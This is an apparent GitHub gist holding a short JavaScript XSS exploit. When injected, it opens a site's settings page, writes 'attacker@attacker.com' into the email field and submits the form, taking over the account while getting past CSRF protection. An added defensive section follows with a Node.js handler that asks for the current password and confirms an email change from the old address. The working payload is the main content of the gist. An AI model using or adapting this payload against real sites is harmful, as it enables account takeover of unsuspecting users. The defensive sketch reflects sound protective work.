@shawarkhanethicalhacker
Created September 14, 2018 20:57
This is a sample exploit for an XSS vulnerability that changes the user's email address. It bypasses some CSRF protections, as the page was revoking the CSRF protections when refreshed.
// A simple XSS exploit for email change
// Shawar Khan
var dark_window = window.open('https://www.target.com/settings');
dark_window.addEventListener('load', function exploit_run() {
    dark_window.document.body.getElementsByTagName('form')[0][2].value = 'attacker@attacker.com'; // changes email
    dark_window.document.body.getElementsByTagName('form')[0][40].click(); // clicks for submission
    setTimeout(function () { // just for delay and closing
        dark_window.close();
    }, 10000);
}, true);
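The script above submits the site's own settings form from the same origin, so any CSRF token embedded in that form is sent along with it. The following server-side sketch is an added example, not part of the gist or of any real site's code: it shows an email-change handler that still refuses such a submission by requiring the current password and staging the change until it is confirmed from the existing address. All function names, field names and sample values are assumptions.

```javascript
const crypto = require('node:crypto');

const hashPassword = (password, salt) => crypto.scryptSync(String(password), salt, 32);

// Constructed sample account record (field names are assumptions).
function makeUser(email, password) {
  const salt = crypto.randomBytes(16);
  return { email, salt, pwHash: hashPassword(password, salt), pendingEmail: null, confirmToken: null };
}

// Constant-time string comparison that also handles unequal lengths.
function safeEqual(a, b) {
  const x = Buffer.from(String(a)), y = Buffer.from(String(b));
  return x.length === y.length && crypto.timingSafeEqual(x, y);
}

// session = { user, csrfToken }; body = parsed form fields (hypothetical names).
function requestEmailChange(session, body) {
  // 1. CSRF token: blocks cross-site forgery, but a same-origin script
  //    submitting the real form passes this check.
  if (!safeEqual(body.csrf_token ?? '', session.csrfToken)) return { status: 403, reason: 'csrf' };
  // 2. Step-up authentication: the current password is not present in the
  //    settings page, so a script driving the form cannot supply it.
  const user = session.user;
  if (!crypto.timingSafeEqual(hashPassword(body.current_password ?? '', user.salt), user.pwHash)) {
    return { status: 401, reason: 'reauth' };
  }
  // 3. Stage the change. The token is mailed to the CURRENT address by the
  //    caller and is never placed in the HTTP response.
  user.pendingEmail = String(body.email);
  user.confirmToken = crypto.randomBytes(32).toString('hex');
  return { status: 202, mailTo: user.email, confirmToken: user.confirmToken };
}

// Applies the staged address only when the mailed token is presented.
function confirmEmailChange(user, token) {
  if (!user.confirmToken || !safeEqual(token, user.confirmToken)) return false;
  user.email = user.pendingEmail;
  user.pendingEmail = user.confirmToken = null;
  return true;
}

// Constructed demo: a form submission with a valid token but no password.
const demoUser = makeUser('owner@example.test', 'constructed-password');
const demoSession = { user: demoUser, csrfToken: 'constructed-token' };
const demoResult = requestEmailChange(demoSession, { csrf_token: 'constructed-token', email: 'other@example.test' });
console.log(demoResult.status, demoUser.email);
```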